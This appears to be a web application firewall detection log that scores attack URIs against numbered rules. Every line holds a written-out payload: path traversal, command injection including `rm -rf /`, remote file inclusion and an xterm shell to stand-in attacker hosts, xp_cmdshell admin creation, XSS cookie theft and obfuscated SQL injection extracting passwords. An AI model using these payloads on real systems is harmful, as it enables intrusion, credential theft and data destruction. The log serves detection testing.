Packet [597]	Uri [/dir/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c%2Bcommand]	PLmin [1]	Score [5]	Nattacks [1]	[930100]
Packet [598]	Uri [/dir/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c%2Bnc]	PLmin [1]	Score [5]	Nattacks [1]	[930100]
Packet [599]	Uri [/dir/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c%2B]	PLmin [1]	Score [5]	Nattacks [1]	[930100]
Packet [600]	Uri [/scripts/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c%2Bdir%2Bc:%5C]	PLmin [1]	Score [5]	Nattacks [1]	[930100]
Packet [601]	Uri [/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c%2Bver]	PLmin [1]	Score [5]	Nattacks [1]	[930100]
Packet [604]	Uri [/dcforum/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00]	PLmin [1]	Score [60]	Nattacks [5]	[920270]	[930100]	[930110]	[930120]	[932160]
Packet [605]	Uri [/cgi-bin//dcforum/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00]	PLmin [1]	Score [60]	Nattacks [5]	[920270]	[930100]	[930110]	[930120]	[932160]
Packet [608]	Uri [/cgi-bin/directorypro.cgi?want=showcat&show=../../../..//etc/motd%00]	PLmin [1]	Score [55]	Nattacks [4]	[920270]	[930100]	[930110]	[930120]
Packet [609]	Uri [/directorypro.cgi?want=showcat&show=../../../../../../../../../../etc/passwd%00]	PLmin [1]	Score [60]	Nattacks [5]	[920270]	[930100]	[930110]	[930120]	[932160]
Packet [610]	Uri [/directorypro.cgi?want=showcat&show=../../../../../../../../../../etc/hosts%00]	PLmin [1]	Score [55]	Nattacks [4]	[920270]	[930100]	[930110]	[930120]
Packet [611]	Uri [/cgi-bin/directorypro.cgi?want=showcat&show=../../../../../../../../../../etc/passwd%00]	PLmin [1]	Score [60]	Nattacks [5]	[920270]	[930100]	[930110]	[930120]	[932160]
Packet [612]	Uri [/cgi-bin/directorypro.cgi?want=showcat&show=../../../../../../../../../../etc/hosts%00]	PLmin [1]	Score [55]	Nattacks [4]	[920270]	[930100]	[930110]	[930120]
Packet [613]	Uri [/interscan/cgi-bin/FtpSave.dll?no]	PLmin [1]	Score [5]	Nattacks [1]	[920440]
Packet [614]	Uri [/interscan/cgi-bin/FtpSave.dll?yes]	PLmin [1]	Score [5]	Nattacks [1]	[920440]
Packet [615]	Uri [/interscan/cgi-bin/FtpSave.dll?hola%20estas%20hackeado]	PLmin [1]	Score [5]	Nattacks [1]	[920440]
Packet [616]	Uri [/SWEditServlet?station_path=Z&publication_id=2043&template=../../../../../../../etc/passwd]	PLmin [1]	Score [40]	Nattacks [4]	[930100]	[930110]	[930120]	[932160]
Packet [617]	Uri [/SWEditServlet?station_path=Z&publication_id=2043&template=../../../../../../../etc/hosts]	PLmin [1]	Score [35]	Nattacks [3]	[930100]	[930110]	[930120]
Packet [622]	Uri [/tarantella/cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd]	PLmin [1]	Score [40]	Nattacks [4]	[930100]	[930110]	[930120]	[932160]
Packet [623]	Uri [/tarantella/cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/hosts]	PLmin [1]	Score [35]	Nattacks [3]	[930100]	[930110]	[930120]
Packet [624]	Uri [/tarantella/cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/hosts.allow]	PLmin [1]	Score [35]	Nattacks [3]	[930100]	[930110]	[930120]
Packet [625]	Uri [/_vti_bin/_vti_aut/fp30reg.dll]	PLmin [1]	Score [5]	Nattacks [1]	[920440]
Packet [626]	Uri [/_vti_bin/_vti_aut/fp30reg.dll?xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx]	PLmin [1]	Score [5]	Nattacks [1]	[920440]
Packet [638]	Uri [/cgi-bin/story.pl?next=../../../etc/passwd%00]	PLmin [1]	Score [60]	Nattacks [5]	[920270]	[930100]	[930110]	[930120]	[932160]
Packet [639]	Uri [/story/story.pl?next=../../../../../../../../../../etc/passwd%00]	PLmin [1]	Score [60]	Nattacks [5]	[920270]	[930100]	[930110]	[930120]	[932160]
Packet [640]	Uri [/cgi-bin/story/story.pl?next=../../../../../../../../../../etc/passwd%00]	PLmin [1]	Score [60]	Nattacks [5]	[920270]	[930100]	[930110]	[930120]	[932160]
Packet [641]	Uri [/cgi-bin/story/story.pl?next=../../../../../../../../../../etc/hosts%00]	PLmin [1]	Score [55]	Nattacks [4]	[920270]	[930100]	[930110]	[930120]
Packet [642]	Uri [/cgi-bin/story/story.pl?next=../../../../../../../../../../etc/hosts.allow%00]	PLmin [1]	Score [55]	Nattacks [4]	[920270]	[930100]	[930110]	[930120]
Packet [644]	Uri [/PHPLibrary-1.5.3/example/lib/grid3.lib.php?cfg_dir=http://www.atacante.com/shell.txt?&]	PLmin [1]	Score [5]	Nattacks [1]	[931120]
Packet [645]	Uri [/PHPLibrary-1.5.3/example/lib/stphpapplication.php?cfg_dir=http://www.atacante.com/shell.txt?&]	PLmin [1]	Score [5]	Nattacks [1]	[931120]
Packet [646]	Uri [/PHPLibrary-1.5.3/example/lib/stphpbtnimage.php?cfg_dir=http://www.atacante.com/shell.txt?&]	PLmin [1]	Score [5]	Nattacks [1]	[931120]
Packet [647]	Uri [/PHPLibrary-1.5.3/example/lib/stphpform.php?cfg_dir=http://www.atacante.com/shell.txt?&]	PLmin [1]	Score [5]	Nattacks [1]	[931120]
Packet [654]	Uri [/cgi-bin/webboard/generate.cgi/?content=../../../../../../../../../directory/file%00&board=boardsname]	PLmin [1]	Score [50]	Nattacks [3]	[920270]	[930100]	[930110]
Packet [655]	Uri [/generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1]	PLmin [1]	Score [50]	Nattacks [3]	[920270]	[930100]	[930110]
Packet [656]	Uri [/cgi-bin/generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1]	PLmin [1]	Score [50]	Nattacks [3]	[920270]	[930100]	[930110]
Packet [657]	Uri [/generate.cgi?content=../../../../../../../../../../etc/passwd%00board=board_1]	PLmin [1]	Score [60]	Nattacks [5]	[920270]	[930100]	[930110]	[930120]	[932160]
Packet [658]	Uri [/cgi-bin/generate.cgi?content=../../../../../../../../../../etc/passwd%00board=board_1]	PLmin [1]	Score [60]	Nattacks [5]	[920270]	[930100]	[930110]	[930120]	[932160]
Packet [659]	Uri [/cgi-bin/ncbook/book.cgi?action=default&current=%7Cls-la/%7C&form_tid=996604045&prev=main.html&list_message_index=10]	PLmin [1]	Score [5]	Nattacks [1]	[932100]
Packet [661]	Uri [/eManager/cgi-bin/register.dll]	PLmin [1]	Score [5]	Nattacks [1]	[920440]
Packet [662]	Uri [/eManager/Content%20Management/ContentFilter.dll]	PLmin [1]	Score [5]	Nattacks [1]	[920440]
Packet [663]	Uri [/eManager/Content%20Management/SFNofitication.dll]	PLmin [1]	Score [5]	Nattacks [1]	[920440]
Packet [664]	Uri [/eManager/Email%20Management/cgi-bin/register.dll]	PLmin [1]	Score [5]	Nattacks [1]	[920440]
Packet [665]	Uri [/eManager/Email%20Management/cgi-bin/TOP10.dll]	PLmin [1]	Score [5]	Nattacks [1]	[920440]
Packet [666]	Uri [/eManager/Email%20Management/cgi-bin/SpamExcp.dll]	PLmin [1]	Score [5]	Nattacks [1]	[920440]
Packet [667]	Uri [/eManager/Email%20Management/cgi-bin/spamrule.dll]	PLmin [1]	Score [5]	Nattacks [1]	[920440]
Packet [668]	Uri [/common/listrec.pl?APP=qmh-news&TEMPLATE=%3Bls%20/etc%7C]	PLmin [1]	Score [5]	Nattacks [1]	[932100]
Packet [671]	Uri [/cgi-bin/eshop.pl?seite=cat%20/etc/hosts]	PLmin [1]	Score [5]	Nattacks [1]	[930120]
Packet [672]	Uri [/cgi-bin/eshop.pl?seite=cat%20/etc/passwd]	PLmin [1]	Score [10]	Nattacks [2]	[930120]	[932160]
Packet [673]	Uri [/modules/WebMail/mailattach.php?userfile=../../config.php&userfile_name=../attachments/file.txt&attachments=]	PLmin [1]	Score [45]	Nattacks [3]	[930100]	[930110]	[930120]
Packet [677]	Uri [/cgi-bin/htsearch?-c/dev/zero]	PLmin [1]	Score [5]	Nattacks [1]	[932160]
Packet [678]	Uri [/cgi-bin/htsearch?-c/etc/hosts]	PLmin [1]	Score [5]	Nattacks [1]	[930120]
Packet [679]	Uri [/cgi-bin/htsearch?-c/etc/passwd]	PLmin [1]	Score [10]	Nattacks [2]	[930120]	[932160]
Packet [691]	Uri [/cgi-bin/viewAttachment.cgi?file=../../../../../etc/passwd]	PLmin [1]	Score [40]	Nattacks [4]	[930100]	[930110]	[930120]	[932160]
Packet [693]	Uri [/store/agora.cgi?cart_id=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&xm=on&product=HTML]	PLmin [1]	Score [20]	Nattacks [4]	[941100]	[941110]	[941160]	[941180]
Packet [694]	Uri [/aktivate/cgi-bin/catgy.cgi?key=0&cartname=axa200135022551089&desc=%3Cscript%3Ealert%28document.domain%29%3C/script%3E]	PLmin [1]	Score [15]	Nattacks [3]	[941100]	[941110]	[941160]
Packet [695]	Uri [/cgi-bin/webdist.cgi?distloc=%3Bcat%20/etc/passwd]	PLmin [1]	Score [15]	Nattacks [3]	[930120]	[932100]	[932160]
Packet [696]	Uri [/webdist.cgi?distloc=%3B/usr/bin/X11/xterm%20-display%20hacker:0.0%20-ut%20-e%20/bin/sh]	PLmin [1]	Score [10]	Nattacks [2]	[932105]	[932160]
Packet [698]	Uri [/cgi-bin/zml.cgi?file=../../../../../../../../../etc/motd%00]	PLmin [1]	Score [55]	Nattacks [4]	[920270]	[930100]	[930110]	[930120]
Packet [699]	Uri [/cgi-bin/zml.cgi?file=../../../../../../../../../../etc/passwd%00]	PLmin [1]	Score [60]	Nattacks [5]	[920270]	[930100]	[930110]	[930120]	[932160]
Packet [703]	Uri [/cgi-bin/faqmanager.cgi?toc=/etc/passwd%00]	PLmin [1]	Score [20]	Nattacks [3]	[920270]	[930120]	[932160]
Packet [705]	Uri [/cgi-bin/publisher/search.cgi?dir=jobs&template=%3Bls%7C&output_number=10]	PLmin [1]	Score [5]	Nattacks [1]	[932100]
Packet [706]	Uri [/mrtg.cgi?cfg=../../../../../../../../etc/passwd]	PLmin [1]	Score [40]	Nattacks [4]	[930100]	[930110]	[930120]	[932160]
Packet [707]	Uri [/mrtg.cgi?cfg=../../../../../../../../etc/hosts]	PLmin [1]	Score [35]	Nattacks [3]	[930100]	[930110]	[930120]
Packet [709]	Uri [/pls/sample/admin_/help/..%255cplsql.conf]	PLmin [1]	Score [10]	Nattacks [2]	[920440]	[930100]
Packet [720]	Uri [/_vti_pvt/administrators.pwd]	PLmin [1]	Score [5]	Nattacks [1]	[920440]
Packet [721]	Uri [/_vti_pvt/authors.pwd]	PLmin [1]	Score [5]	Nattacks [1]	[920440]
Packet [722]	Uri [/_vti_pvt/service.pwd]	PLmin [1]	Score [5]	Nattacks [1]	[920440]
Packet [723]	Uri [/_vti_pvt/users.pwd]	PLmin [1]	Score [5]	Nattacks [1]	[920440]
Packet [726]	Uri [/ans/ans.pl?p=../../../../../usr/bin/id%7C&blah]	PLmin [1]	Score [40]	Nattacks [3]	[930100]	[930110]	[932160]
Packet [728]	Uri [/cgi-bin/.cobalt/alert/service.cgi?service=%3Cscript%3Ealert%28%27Vulnerable%27%29%3C/script%3E]	PLmin [1]	Score [15]	Nattacks [3]	[941100]	[941110]	[941160]
Packet [729]	Uri [/cgi-bin/.cobalt/alert/service.cgi?service=%3Cimg%20src=javascript:alert%28%27Vulnerable%27%29%3E]	PLmin [1]	Score [25]	Nattacks [5]	[941100]	[941140]	[941160]	[941170]	[941210]
Packet [730]	Uri [/directory.php?dir=%3Bcat%20/etc/passwd]	PLmin [1]	Score [15]	Nattacks [3]	[930120]	[932100]	[932160]
Packet [731]	Uri [/directory.php?dir=%3Bcat%20/etc/hosts]	PLmin [1]	Score [10]	Nattacks [2]	[930120]	[932100]
Packet [736]	Uri [/cgi-bin/csSearch.cgi?command=savesetup&setup=%60cat%20/etc/passwd%60]	PLmin [1]	Score [15]	Nattacks [3]	[930120]	[932100]	[932160]
Packet [737]	Uri [/cgi-bin/csSearch.cgi?command=savesetup&setup=%60rm%20-rf%20/%60]	PLmin [1]	Score [10]	Nattacks [2]	[932105]	[932115]
Packet [738]	Uri [/csSearch.cgi?command=savesetup&setup=%2AShowSearchForm%3D%2ALogin%3Dsub%7Bprint%22%3Cform%2Bmethod%3Dpost%2Baction%3DcsSearch.cgi%3EEnter%2Bls%2B-l%2B%3Cbr%3E%3Cinput%2Btype%3Dtext%2Bname%3Dcmd%2Bsize%3D99%3E%2B%3Cinput%2Btype%3Dsubmit%2Bvalue%3DExecute%3E%3Chr%3E%3Cxmp%3E%22%3B%24in%7B%27cmd%27%7D%26%26print%60%24in%7B%27cmd%27%7D%2B2%3E%261%60%3Bexit%3B%7D%3B]	PLmin [1]	Score [20]	Nattacks [4]	[932110]	[932115]	[941140]	[941160]
Packet [740]	Uri [/cgi-bin/csGuestBook.cgi?command=savesetup&setup=%3Bsystem%28%27cat%20/etc/passwd%27%29]	PLmin [1]	Score [15]	Nattacks [3]	[930120]	[932160]	[933160]
Packet [741]	Uri [/cgi-bin/csGuestBook.cgi?command=savesetup&setup=%3Bsystem%28%27cat%20/etc/hosts%27%29]	PLmin [1]	Score [10]	Nattacks [2]	[930120]	[933160]
Packet [746]	Uri [/global.inc]	PLmin [1]	Score [5]	Nattacks [1]	[920440]
Packet [760]	Uri [/servlet/org.apache.catalina.servlets.WebdavStatus/%3CSCRIPT%3Ealert%28document.domain%29%3C/SCRIPT%3E]	PLmin [1]	Score [5]	Nattacks [1]	[941110]
Packet [761]	Uri [/servlet/org.apache.catalina.ContainerServlet/%3CSCRIPT%3Ealert%28document.domain%29%3C/SCRIPT%3E]	PLmin [1]	Score [5]	Nattacks [1]	[941110]
Packet [762]	Uri [/servlet/org.apache.catalina.Context/%3CSCRIPT%3Ealert%28document.domain%29%3C/SCRIPT%3E]	PLmin [1]	Score [5]	Nattacks [1]	[941110]
Packet [763]	Uri [/servlet/org.apache.catalina.Globals/%3CSCRIPT%3Ealert%28document.domain%29%3C/SCRIPT%3E]	PLmin [1]	Score [5]	Nattacks [1]	[941110]
Packet [764]	Uri [/error/500error.jsp?et=1%3Cscript%3Ealert%28%27KPMG%27%29%3C/script%3E]	PLmin [1]	Score [15]	Nattacks [3]	[941100]	[941110]	[941160]
Packet [765]	Uri [/path/modules.php?op=modload&name=Wiki&file=index&pagename=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E]	PLmin [1]	Score [20]	Nattacks [4]	[941100]	[941110]	[941160]	[941180]
Packet [766]	Uri [/scripts/db4web_c.exe/dbdirname/c%3A%5Cboot.ini]	PLmin [1]	Score [5]	Nattacks [1]	[920440]
Packet [768]	Uri [/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22%3Becho%20%27%27%3B%20echo%20%60ls%20-l%20/%20%60%3Bdie%28%29%3Becho%22]	PLmin [1]	Score [10]	Nattacks [2]	[932100]	[932110]
Packet [772]	Uri [/cgi-bin/ion-p?page=../../../../../etc/hosts]	PLmin [1]	Score [35]	Nattacks [3]	[930100]	[930110]	[930120]
Packet [776]	Uri [/html/partner.php?mainfile=anything&Default_Theme=%27%3Cscript%3Ealert%28document.cookie%29%3B%3C/script%3E]	PLmin [1]	Score [20]	Nattacks [4]	[941100]	[941110]	[941160]	[941180]
Packet [777]	Uri [/html/chatheader.php?mainfile=anything&Default_Theme=%27%3Cscript%3Ealert%28document.cookie%29%3B%3C/script%3E]	PLmin [1]	Score [20]	Nattacks [4]	[941100]	[941110]	[941160]	[941180]
Packet [779]	Uri [/cgi-bin/psunami.cgi?action=board&board=1&topic=%7Cls%20-al%20/%7C]	PLmin [1]	Score [5]	Nattacks [1]	[932100]
Packet [783]	Uri [/%3C%3f%60echo%27%3C%3fpassthru%28%5c%24c%29%3f%3E%27%3E%3E./x.php%60%3f%3E]	PLmin [1]	Score [5]	Nattacks [1]	[933160]
Packet [784]	Uri [/typo3/typo3/dev/translations.php?ONLY=/etc/httpd/logs/error_log%00%27]	PLmin [1]	Score [15]	Nattacks [2]	[920270]	[930120]
Packet [786]	Uri [/cgi-bin/smartsearch.cgi?keywords=%7C/bin/cat%20/etc/passwd%7C]	PLmin [1]	Score [15]	Nattacks [3]	[930120]	[932100]	[932160]
Packet [787]	Uri [/cgi-bin/smartsearch/smartsearch.cgi?keywords=%7C/bin/cat%20/etc/passwd%7C]	PLmin [1]	Score [15]	Nattacks [3]	[930120]	[932100]	[932160]
Packet [788]	Uri [/cgi.bin/smartsearch/smartsearch.cgi?keywords=%7Cls%20-la%20/%7C]	PLmin [1]	Score [5]	Nattacks [1]	[932100]
Packet [789]	Uri [/%7Edumbuser/cool-logs/mlog.html?screen=/etc/hosts]	PLmin [1]	Score [5]	Nattacks [1]	[930120]
Packet [790]	Uri [/%7Edumbuser/cool-logs/mlog.html?screen=/etc/passwd]	PLmin [1]	Score [10]	Nattacks [2]	[930120]	[932160]
Packet [792]	Uri [/modules.php?op=modload&name=Forums&file=viewtopic&topic=1&forum=1%27%20INTO%20OUTFILE%20%27/vt.txt]	PLmin [1]	Score [5]	Nattacks [1]	[942190]
Packet [793]	Uri [/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	PLmin [1]	Score [10]	Nattacks [2]	[933130]	[933160]
Packet [794]	Uri [/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	PLmin [1]	Score [10]	Nattacks [2]	[933130]	[933160]
Packet [795]	Uri [/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	PLmin [1]	Score [10]	Nattacks [2]	[933130]	[933160]
Packet [796]	Uri [/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	PLmin [1]	Score [15]	Nattacks [3]	[932150]	[933130]	[933160]
Packet [797]	Uri [/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	PLmin [1]	Score [15]	Nattacks [3]	[932150]	[933130]	[933160]
Packet [799]	Uri [/cgi-bin/testcgi.exe?%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%22]	PLmin [1]	Score [20]	Nattacks [4]	[941100]	[941110]	[941160]	[941180]
Packet [801]	Uri [/WebAdmin.dll?Session=X&Program=MDaemon&Directory:Name=C:%5CWINNT&File:Name=WIN.INI&View=ViewFile]	PLmin [1]	Score [5]	Nattacks [1]	[920440]
Packet [806]	Uri [/cgi-bin/input.bat?%7Cdir..%5C..%5Cwindows]	PLmin [1]	Score [15]	Nattacks [3]	[920440]	[930100]	[932110]
Packet [808]	Uri [/iisprotect/admin/SiteAdmin.ASP?V_SiteName=&V_FirstTab=Groups&V_SecondTab=All&GroupName=gyrniff_gr%27%3Bexec%20master..xp_cmdshell%27ping%2010.10.10.11%27%3B--]	PLmin [1]	Score [10]	Nattacks [2]	[932100]	[942190]
Packet [809]	Uri [/iisprotect/admin/SiteAdmin.ASP?V_SiteName=&V_FirstTab=Groups&V_SecondTab=All&GroupName=gyrniff_gr%27%3Bexec%20master..xp_cmdshell%27net%20user%20algo%20hacker%20/add%27%3B--]	PLmin [1]	Score [10]	Nattacks [2]	[932100]	[942190]
Packet [810]	Uri [/iisprotect/admin/SiteAdmin.ASP?V_SiteName=&V_FirstTab=Groups&V_SecondTab=All&GroupName=gyrniff_gr%27%3Bexec%20master..xp_cmdshell%27net%20localgroup%20administrators%20algo%20/add%27%3B--]	PLmin [1]	Score [10]	Nattacks [2]	[932100]	[942190]
Packet [815]	Uri [/database/philboard.mdb]	PLmin [1]	Score [5]	Nattacks [1]	[920440]
Packet [816]	Uri [/forum/database/philboard.mdb]	PLmin [1]	Score [5]	Nattacks [1]	[920440]
Packet [819]	Uri [/cgi-bin/nph-exploitscanget.cgi?host=%3Cscript%3Ealert%28document%2Ecookie%29%3C%2Fscript%3E&port=80&idsbypass=0&errchk=1]	PLmin [1]	Score [20]	Nattacks [4]	[941100]	[941110]	[941160]	[941180]
Packet [822]	Uri [/forum_details.php?user_nick=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E]	PLmin [1]	Score [20]	Nattacks [4]	[941100]	[941110]	[941160]	[941180]
Packet [823]	Uri [/phpBB2/viewtopic.php?sid=1&topic_id=-1%20un%69o%6e%20s%65%6cect%20%6f%72d%28%73%75bs%74rin%67%28%75%73%65%72_passwo%72%64%2c%31%2c%31%29%29%20f%72%6fm%20ph%70%62%62%5fu%73e%72s%20w%68%65r%65%20%75%73%65r_%69d%3d2/%2a&view=newest]	PLmin [1]	Score [15]	Nattacks [3]	[942190]	[942270]	[942360]
Packet [824]	Uri [/phpBB2/viewtopic.php?sid=1&topic_id=-1%20%75nio%6e%20s%65%6cec%74%20%6f%72%64%28%73%75%62%73tr%69ng%28%75s%65%72%5fpas%73%77o%72d%2c%32%2c%31%29%29%20%66%72o%6d%20%70hpb%62_u%73%65r%73%20%77h%65%72e%20u%73e%72_id%3d2/%2A&view=newest]	PLmin [1]	Score [15]	Nattacks [3]	[942190]	[942270]	[942360]
Packet [825]	Uri [/phpBB2/viewtopic.php?sid=1&topic_id=-1%20%75ni%6f%6e%20s%65%6c%65%63%74%20%6f%72%64%28%73%75%62%73%74%72in%67%28u%73e%72%5f%70a%73swo%72%64%2c%33%2c%31%29%29%20%66%72o%6d%20phpbb%5f%75se%72s%20%77h%65%72e%20%75%73e%72_i%64=2/%2a&view=newest]	PLmin [1]	Score [15]	Nattacks [3]	[942190]	[942270]	[942360]
Packet [826]	Uri [/phpBB2/viewtopic.php?sid=1&topic_id=-1%20%75ni%6f%6e%20sel%65%63%74%20o%72%64%28s%75bst%72in%67%28%75s%65r%5fp%61ss%77%6f%72%64]	PLmin [1]	Score [10]	Nattacks [2]	[942190]	[942360]
Packet [827]	Uri [/phpBB2/viewtopic.php?sid=1&topic_id=-1%20un%69on%20sel%65%63%74%20%6f%72%64%28%73%75%62%73%74%72%69n%67%28%75%73%65%72_pa%73%73wo%72d]	PLmin [1]	Score [10]	Nattacks [2]	[942190]	[942360]
Packet [828]	Uri [/phpBB2/viewtopic.php?sid=1&topic_id=-1%20%75nio%6e%20s%65%6c%65ct%20%6frd%28s%75%62s%74ri%6eg%28u%73%65r%5f%70a%73sw%6fr%64%2c6%2c%31%29%29%20%66ro%6d%20%70%68%70%62%62_%75%73e%72%73%20%77%68er%65%20u%73%65%72_%69d=2/%2a&view=newest]	PLmin [1]	Score [15]	Nattacks [3]	[942190]	[942270]	[942360]
Packet [829]	Uri [/phpBB2/viewtopic.php?sid=1&topic_id=-1%20u%6ei%6f%6e%20sel%65ct%20%6f%72%64%28s%75%62s%74%72in%67%28%75s%65%72%5f%70%61s%73%77%6fr%64]	PLmin [1]	Score [10]	Nattacks [2]	[942190]	[942360]
Packet [830]	Uri [/phpBB2/viewtopic.php?sid=1&topic_id=-1%20%75%6e%69o%6e%20%73el%65c%74%20o%72%64%28s%75b%73trin%67%28us%65%72_%70%61s%73wo%72%64]	PLmin [1]	Score [10]	Nattacks [2]	[942190]	[942360]
Packet [831]	Uri [/phpBB2/viewtopic.php?sid=1&topic_id=-1%20un%69%6fn%20s%65le%63t%20o%72%64%28s%75b%73%74rin%67%28u%73%65%72_%70%61s%73wo%72d]	PLmin [1]	Score [10]	Nattacks [2]	[942190]	[942360]
Packet [832]	Uri [/phpBB2/viewtopic.php?sid=1&topic_id=-1%20u%6ei%6f%6e%20se%6c%65%63%74%20or%64%28s%75%62%73tr%69ng%28us%65r_passwo%72d%2c1%30%2c%31%29%29%20%66r%6f%6d%20ph%70%62b%5fu%73%65%72%73%20w%68%65re%20us%65%72%5fi%64=%32%2f%2A&view=newest]	PLmin [1]	Score [15]	Nattacks [3]	[942190]	[942270]	[942360]
Packet [833]	Uri [/phpBB2/viewtopic.php?sid=1&topic_id=-1%20un%69o%6e%20sel%65%63t%20%6f%72d%28s%75bst%72in%67%28use%72%5f%70as%73%77o%72%64]	PLmin [1]	Score [10]	Nattacks [2]	[942190]	[942360]
Packet [834]	Uri [/phpBB2/viewtopic.php?sid=1&topic_id=-1%20%75%6ei%6f%6e%20sel%65ct%20%6f%72d%28subs%74%72%69ng%28%75%73%65r%5f%70%61%73s%77%6frd%2c1%32]	PLmin [1]	Score [10]	Nattacks [2]	[942190]	[942360]
Packet [835]	Uri [/phpBB2/viewtopic.php?sid=1&topic_id=-1%20%75nio%6e%20%73e%6cec%74%20%6frd%28su%62%73%74%72in%67%28%75%73%65%72_%70%61%73%73%77%6frd%2c1%33]	PLmin [1]	Score [10]	Nattacks [2]	[942190]	[942360]
Packet [836]	Uri [/phpBB2/viewtopic.php?sid=1&topic_id=-1%20un%69on%20%73%65%6c%65c%74%20o%72d%28s%75%62%73tr%69%6eg%28%75ser_%70%61s%73%77o%72d%2c%314]	PLmin [1]	Score [10]	Nattacks [2]	[942190]	[942360]
Packet [837]	Uri [/phpBB2/viewtopic.php?sid=1&topic_id=-1%20%75n%69o%6e%20%73%65le%63%74%20ord%28%73%75b%73%74%72in%67%28%75s%65%72%5fp%61%73%73%77ord%2c%315]	PLmin [1]	Score [10]	Nattacks [2]	[942190]	[942360]
Packet [838]	Uri [/phpBB2/viewtopic.php?sid=1&topic_id=-1%20un%69%6f%6e%20sel%65ct%20or%64%28su%62s%74%72ing%28u%73er%5fpa%73s%77or%64%2c%31%36]	PLmin [1]	Score [10]	Nattacks [2]	[942190]	[942360]
Packet [839]	Uri [/phpBB2/viewtopic.php?sid=1&topic_id=-1%20un%69%6fn%20%73ele%63t%20o%72%64%28%73%75%62s%74%72%69n%67%28%75%73er_%70asswo%72d%2c17]	PLmin [1]	Score [10]	Nattacks [2]	[942190]	[942360]
Packet [840]	Uri [/phpBB2/viewtopic.php?sid=1&topic_id=-1%20u%6e%69%6fn%20s%65l%65%63t%20o%72%64%28su%62st%72%69n%67%28%75%73er_%70%61ss%77%6f%72%64%2c1%38%2c%31%29%29%20f%72%6fm%20%70hpb%62%5fu%73e%72%73%20%77h%65re%20u%73e%72_id%3d%32%2f%2a&view=newest]	PLmin [1]	Score [15]	Nattacks [3]	[942190]	[942270]	[942360]
Packet [841]	Uri [/phpBB2/viewtopic.php?sid=1&topic_id=-1%20%75nio%6e%20sel%65%63%74%20%6f%72%64%28%73ub%73tri%6eg%28%75%73%65r_pa%73%73wor%64%2c%319]	PLmin [1]	Score [10]	Nattacks [2]	[942190]	[942360]
Packet [842]	Uri [/phpBB2/viewtopic.php?sid=1&topic_id=-1%20%75ni%6f%6e%20se%6c%65%63%74%20o%72d%28%73u%62%73%74r%69n%67%28%75%73e%72_pa%73%73%77%6f%72%64]	PLmin [1]	Score [10]	Nattacks [2]	[942190]	[942360]
Packet [843]	Uri [/phpBB2/viewtopic.php?sid=1&topic_id=-1%20%75%6e%69%6f%6e%20%73el%65c%74%20ord%28s%75b%73t%72%69n%67%28%75ser%5fpa%73s%77ord]	PLmin [1]	Score [10]	Nattacks [2]	[942190]	[942360]
Packet [844]	Uri [/phpBB2/viewtopic.php?sid=1&topic_id=-1%20%75n%69%6f%6e%20s%65le%63t%20%6frd%28%73u%62s%74%72in%67%28us%65r%5fp%61s%73%77or%64]	PLmin [1]	Score [10]	Nattacks [2]	[942190]	[942360]
Packet [845]	Uri [/phpBB2/viewtopic.php?sid=1&topic_id=-1%20%75%6e%69%6f%6e%20se%6ce%63t%20%6f%72%64%28s%75bst%72%69ng%28%75%73%65r%5f%70%61%73%73wo%72d]	PLmin [1]	Score [10]	Nattacks [2]	[942190]	[942360]
Packet [846]	Uri [/phpBB2/viewtopic.php?sid=1&topic_id=-1%20%75%6e%69%6f%6e%20%73%65l%65%63%74%20o%72d%28subst%72i%6e%67%28%75s%65r_passw%6fr%64]	PLmin [1]	Score [10]	Nattacks [2]	[942190]	[942360]
Packet [847]	Uri [/phpBB2/viewtopic.php?sid=1&topic_id=-1%20uni%6fn%20se%6cec%74%20%6frd%28s%75%62s%74%72%69n%67%28us%65%72_passwo%72d%2c%325]	PLmin [1]	Score [10]	Nattacks [2]	[942190]	[942360]
